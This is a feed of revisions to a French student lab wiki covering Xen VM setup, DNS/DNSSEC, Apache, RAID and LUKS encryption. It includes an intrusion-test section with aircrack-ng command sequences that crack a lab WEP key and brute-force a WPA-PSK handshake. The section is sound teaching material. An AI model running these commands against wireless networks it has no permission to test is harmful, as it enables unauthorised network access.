 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe notre clé est chiffré.&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57813</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57813"/>
				<updated>2022-01-10T18:26:30Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Chiffrement de données */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
 /etc/bind&lt;br /&gt;
&lt;br /&gt;
On crée le dossier karmeliet.site.dnssec&lt;br /&gt;
 mkdir karmeliet.site.dnssec&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de signature de clefs de zone&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On crée la clef asymétrique de la zone pour signer les enregistrements&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1024 -n ZONE karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On renomme les deux paires de clefs avec le nom de notre zone en ajoutant -ksk et -zsk pour les clefs correspondantes.&lt;br /&gt;
&lt;br /&gt;
On inclue les clefs publiques dans votre fichier de zone db.karmeliet.site et on incrémente le numéro de version de la zone&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-ksk.key&lt;br /&gt;
 $include /etc/bind/karmeliet.site.dnssec/karmeliet.site-zsk.key&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone&lt;br /&gt;
 dnssec-signzone -o karmeliet.site -k karmeliet.site-ksk ../db.karmeliet.site karmeliet.site-zsk&lt;br /&gt;
&lt;br /&gt;
On modifie le fichier named.conf.local pour utiliser la zone signée de suffixe db.karmeliet.site.signed;&lt;br /&gt;
&lt;br /&gt;
Il ne reste plus qu’à communiquer la partie publique de la KSK dans gandi.net&lt;br /&gt;
&lt;br /&gt;
==Certificat==&lt;br /&gt;
&lt;br /&gt;
Dans Gandi.net, on achète notre certificat en allant sur &lt;br /&gt;
 SSL certificate&lt;br /&gt;
&lt;br /&gt;
On nous demande une &amp;quot;Certificate Request&amp;quot; CSR que l'on a grâce à la commande &lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
On remplit les différentes informations que l'on nous demande et on récupère notre csr dans server.csr à la fin de la commande.&lt;br /&gt;
&lt;br /&gt;
On va sur la page de notre certificat pour gandi et on copie colle comme ceci dans notre fichier db.karmeliet.site pour que notre certficat soit valide&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
 www	IN	A	193.48.57.179&lt;br /&gt;
 _D83578361950694C7CBA2CF57DDA0CE7.karmeliet.site. 10800 IN CNAME BEF099045291643A940FA49D11E8FB10.4CCF28E6A180333498A3F008A8B6CB32.0e21313c9c6df2403142.sectigo.com.&lt;br /&gt;
&lt;br /&gt;
==Serveur apache==&lt;br /&gt;
&lt;br /&gt;
On installe un serveur apache pour vérifier que tout fonctionne&lt;br /&gt;
 apt install apache2&lt;br /&gt;
&lt;br /&gt;
Pour installer apache correctement on a suivi les instructions sur ce site&lt;br /&gt;
 https://ubuntu.com/tutorials/install-and-configure-apache#1-overview&lt;br /&gt;
&lt;br /&gt;
Puis on a modifié notre fichier de configuration apache se trouvant dans /etc/apache2/sites-available&lt;br /&gt;
pour y mettre notre certificat :&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site&lt;br /&gt;
         Redirect permanent / https://karmeliet.site/&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt; &lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
         ServerAdmin webmaster@localhost&lt;br /&gt;
         DocumentRoot /var/www/karmeliet.site&lt;br /&gt;
         ServerName karmeliet.site&lt;br /&gt;
         ServerAlias www.karmeliet.site &lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
         SSLEngine on&lt;br /&gt;
         SSLCertificateFile /root/karmeliet.site.crt&lt;br /&gt;
         SSLCertificateKeyFile /root/karmeliet.site.key&lt;br /&gt;
 &lt;br /&gt;
         ErrorLog ${APACHE_LOG_DIR}/error.log&lt;br /&gt;
         CustomLog ${APACHE_LOG_DIR}/access.log combined&lt;br /&gt;
 &lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
= Tests d'intrusions =&lt;br /&gt;
&lt;br /&gt;
===5.2 Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
&lt;br /&gt;
Cette commande sert à récupérer le nom de l'interface réseau:&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Notre interface réseau s'appelle &amp;quot;wlan0mon&amp;quot; (renommé automatiquement parce que celui de base était trop long)&lt;br /&gt;
 &lt;br /&gt;
On démarre l'interface sur le channel 3 :&lt;br /&gt;
 airmon-ng start wlan0mon 3&lt;br /&gt;
&lt;br /&gt;
On récupère le BSSID du point d'accès sur lequel on veut récupérer la clé WEP&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On réalise un test d'injection sur cracotte10&lt;br /&gt;
 aireplay-ng -9 -e cracotte10 -a 04:DA:D2:9C:50:59 wlan0mon&lt;br /&gt;
&lt;br /&gt;
On récupère les VI générés par le point d'accès pour les stocker dans output :&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:59 -w output wlan0mon&lt;br /&gt;
&lt;br /&gt;
On effectue de fausses authentifications  &lt;br /&gt;
 aireplay-ng -1 0 -e cracotte10 -a 04:DA:D2:9C:50:59 -h 40:A5:EF:D2:11:67 wlan0mon&lt;br /&gt;
&lt;br /&gt;
La clef WEP est alors décriptable :&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:59 output*.cap&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenu est le suivant :&lt;br /&gt;
 KEY FOUND! [ 55:55:55:55:5A:BC:11:CB:A4:44:44:44:44 ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
===5.3  Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Comme pour le cassage de la clé WEP, on utilise aircrack-ng:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
On récupère le nom de notre interface qui est wlan0mon puis on le lance en mode moniteur sur le channel 7:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlan0mon 4&lt;br /&gt;
&lt;br /&gt;
Il nous faut un point d'accès pour pouvoir casser une clé WPA en récupérant son BSSID: &lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
On choisit kracotte11 avec un BSSID 44:AD:D9:5F:87:0A, on récupère ce qu'on appelle &amp;quot;handshake&amp;quot; et on le sauvegarde dans un fichier sauv:&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:0A -w sauv wlan0mon&lt;br /&gt;
&lt;br /&gt;
On peut commencer le crackage:&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng sauv-01.cap -w dico.txt&lt;br /&gt;
&lt;br /&gt;
=Réalisation=&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de données==&lt;br /&gt;
&lt;br /&gt;
Nous créons trois partitions LVM de 1Go dans le groupe de volume storage avec comme noms celui de notre serveur&lt;br /&gt;
 lvcreate -L1G -n oronge-raid1 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid2 storage&lt;br /&gt;
 lvcreate -L1G -n oronge-raid3 storage&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les partitions à notre fichier de configuration qui se trouve dans /etc/xen/Karmeliet.cfg&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid1,xvdb1,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid2,xvdb2,w',&lt;br /&gt;
 'phy:/dev/storage/karmeliet.site-raid3,xvdb3,w'&lt;br /&gt;
&lt;br /&gt;
On éteint puis relance la VM et on crée la partition Raid&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvdb1 /dev/xvdb2 /dev/xvdb3&lt;br /&gt;
&lt;br /&gt;
On formate la partition en ext4&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
On ajoute au fichier /etc/fstab la partition formaté /dev/md0 pour qu'il soit monté durant le démarrage de la VM&lt;br /&gt;
 /dev/md0 /media/raid ext4 defaults 0 1&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
==Chiffrement de données==&lt;br /&gt;
&lt;br /&gt;
On installe avec apt cryptsetup&lt;br /&gt;
 apt install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
On regarde où est notre clé usb grâce à la commande lsblk, dans notre cas elle est dans sdb&lt;br /&gt;
&lt;br /&gt;
On la formatte &lt;br /&gt;
 mkfs.ext4 /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On initialise notre clé USB avec l'option luksFormat et on choisis un mot de passe &lt;br /&gt;
 cryptsetup luksFormat /dev/sdb&lt;br /&gt;
&lt;br /&gt;
On ouvre notre partition chiffrée avec luksOpen (le nom du volume sera karmeliet_crypted) et on la formatte :&lt;br /&gt;
 cryptsetup luksOpen /dev/sdc karmeliet_crypted&lt;br /&gt;
 mkfs.ext4 /dev/mapper/karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On monte la partition &lt;br /&gt;
 mkdir /mnt/karmelietCrypte&lt;br /&gt;
 mount -t ext4 /dev/mapper/karmeliet_crypted /mnt/karmelietCrypte/ &lt;br /&gt;
&lt;br /&gt;
On y ajoute un fichier texte hello dans lequel on  écrit &amp;quot;cc&amp;quot; puis on démonte la clé et on ferme le volume chiffré&lt;br /&gt;
 umount /mnt/karmelietCrypte&lt;br /&gt;
 cryptsetup luksClose karmeliet_crypted&lt;br /&gt;
&lt;br /&gt;
On a plus qu'a aller tester notre clé USB en la montant sur l'ordinateur d'un autre binôme et cela nous demande bien de rentrer un mot de passe&lt;/div&gt;</summary>
		<author><name>Sbensale</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57811</id>
		<title>TP sysres IMA5 2021/2022 G4</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G4&amp;diff=57811"/>
				<updated>2022-01-10T18:23:29Z</updated>
		
		<summary type="html">&lt;p&gt;Sbensale : /* Réalisation */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Cablage Réseau=&lt;br /&gt;
&lt;br /&gt;
=Machine Virtuelle=&lt;br /&gt;
&lt;br /&gt;
==Création de la machine virtuelle==&lt;br /&gt;
&lt;br /&gt;
Commande pour la création de la machine virtuelle:&lt;br /&gt;
 root@capbreton:~$ xen-create-image --hostname=Karmeliet --ip=193.48.57.179 --gateway=193.48.57.187 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
On créé 2 LV de 10 Go pour les allouer plus tard mais pour cela nous devons d'abord voir quel volume groupe choisir (on choisit celui qui dispose du plus grand espace).&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# vgdisplay&lt;br /&gt;
  --- Volume group ---&lt;br /&gt;
  VG Name               storage&lt;br /&gt;
  System ID             &lt;br /&gt;
  Format                lvm2&lt;br /&gt;
  Metadata Areas        2&lt;br /&gt;
  Metadata Sequence No  152&lt;br /&gt;
  VG Access             read/write&lt;br /&gt;
  VG Status             resizable&lt;br /&gt;
  MAX LV                0&lt;br /&gt;
  Cur LV                26&lt;br /&gt;
  Open LV               16&lt;br /&gt;
  Max PV                0&lt;br /&gt;
  Cur PV                2&lt;br /&gt;
  Act PV                2&lt;br /&gt;
  VG Size               &amp;lt;5.46 TiB&lt;br /&gt;
  PE Size               4.00 MiB&lt;br /&gt;
  Total PE              1430526&lt;br /&gt;
  Alloc PE / Size       50176 / 196.00 GiB&lt;br /&gt;
  Free  PE / Size       1380350 / &amp;lt;5.27 TiB&lt;br /&gt;
  VG UUID               eusQhE-lOxZ-cQqQ-uFxt-dYjG-LuwI-HL0flc&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet1 storage&lt;br /&gt;
 root@capbreton:~$ lvcreate -L10G -n Karmeliet2 storage&lt;br /&gt;
&lt;br /&gt;
Il est nécessaire de les formater au format ext4 :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet1&lt;br /&gt;
 root@capbreton:~$ mkfs.ext4 /dev/storage/Karmeliet2&lt;br /&gt;
&lt;br /&gt;
Dans notre fichier /etc/xen/Karmeliet.cfg, on doit indiquer que notre VM doit possèder les volumes logiques que l'on a créé auparavant (Karmeliet1 et Karmeliet2).&lt;br /&gt;
Il est, également, nécessaire d'indiquer le bridge IMA5sc.&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ vim /etc/xen/Karmeliet.cfg&lt;br /&gt;
 #Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Karmeliet/swap.img,xvda1,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet1,xvda3,w',&lt;br /&gt;
                  'phy:/dev/storage/Karmeliet2,xvda4,w'&lt;br /&gt;
              ]&lt;br /&gt;
 #Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.179 ,mac=00:16:3E:5E:59:17 ,bridge=IMA5sc' ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On lance la machine virtuelle :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~$ xl create -c /etc/xen/Karmeliet.cfg&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On doit créer xvda3 et xvda4 pour nos répertoires var et home:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mkdir /mnt/xvda4&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 root@Karmeliet:~$ mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Le répertoire var doit être placé dans le disque xvda4 :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/fstab, il est nécesaire d'ajouter les lignes ci-dessous pour pouvoir monter les disques par la suite:&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda3 /home ext4 defaults 0 2&lt;br /&gt;
 root@Karmeliet:~$ /dev/xvda4 /var ext4 defaults 0 2&lt;br /&gt;
&lt;br /&gt;
La commande suivant permet de monter les disques :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ mount -a&lt;br /&gt;
&lt;br /&gt;
Pour vérifier que le montage s'est faite correctement, on peut voir avec la commande lsblk si les partitions sont bien visibles :&lt;br /&gt;
&lt;br /&gt;
 root@Karmeliet:~$ lsblk&lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 xvda3 202:3    0   10G  0 disk /home&lt;br /&gt;
 xvda4 202:4    0   10G  0 disk /var&lt;br /&gt;
&lt;br /&gt;
Pour accéder à notre VM :&lt;br /&gt;
&lt;br /&gt;
 root@capbreton:~# xen console Karmeliet&lt;br /&gt;
&lt;br /&gt;
=Services Internet=&lt;br /&gt;
==Connexion ssh==&lt;br /&gt;
&lt;br /&gt;
Pour se connecter en ssh, nous allons dans le fichier se trouvant au chemin :&lt;br /&gt;
 /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
On décommente Port et PermitRootLogin et on leur donne la valeur :&lt;br /&gt;
&lt;br /&gt;
 Port 22222&lt;br /&gt;
 PermitRootLogin Yes&lt;br /&gt;
&lt;br /&gt;
On a plus qu'à se connecter via ssh  : &lt;br /&gt;
 ssh root@193.48.57.179 -p 22222&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==DNS==&lt;br /&gt;
&lt;br /&gt;
On réserve un nom de domaine sur ghandi.net, en l'occurrence le notre sera : &lt;br /&gt;
 karmeliet.site&lt;br /&gt;
&lt;br /&gt;
On rentre notre adresse IPv4 dans le &amp;quot;Glue records&amp;quot;&lt;br /&gt;
 193.48.57.179&lt;br /&gt;
&lt;br /&gt;
On ajoute nos DNS primaire et secondaire pour obtenir un nom de serveur&lt;br /&gt;
 ns1.karmeliet.site (primaire)&lt;br /&gt;
 ns6.gandi.net (secondaire)&lt;br /&gt;
&lt;br /&gt;
===Configuration de bind9===&lt;br /&gt;
&lt;br /&gt;
On installe les paquets&lt;br /&gt;
 apt install bind9&lt;br /&gt;
&lt;br /&gt;
On change le fichier /etc/resolv.conf&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
&lt;br /&gt;
On va configurer notre DNS primaire dans le fichier de configuration /etc/bind/named.conf.local&lt;br /&gt;
De plus, on autorise le transfert d'information avec le DNS Secondaire (217.70.177.40)&lt;br /&gt;
 zone &amp;quot;karmeliet.site&amp;quot; {&lt;br /&gt;
   type master;&lt;br /&gt;
   file &amp;quot;/etc/bind/db.karmeliet.site&amp;quot;;&lt;br /&gt;
   allow-transfer { 217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
On créé un fichier db.karmeliet.site ayant le même template que db.local &lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA      ns1.karmeliet.site.  postmaster.karmeliet.site(&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.karmeliet.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.179&lt;br /&gt;
&lt;br /&gt;
==Sécurisation de serveur DNS par DNSSEC==&lt;br /&gt;
&lt;br /&gt;
On ajoute dans le fichier named.conf.options&lt;br /&gt;
 dnssec-enable yes; &lt;br /&gt;
&lt;br /&gt;
On va dans le dossier bind&lt;br /&gt;
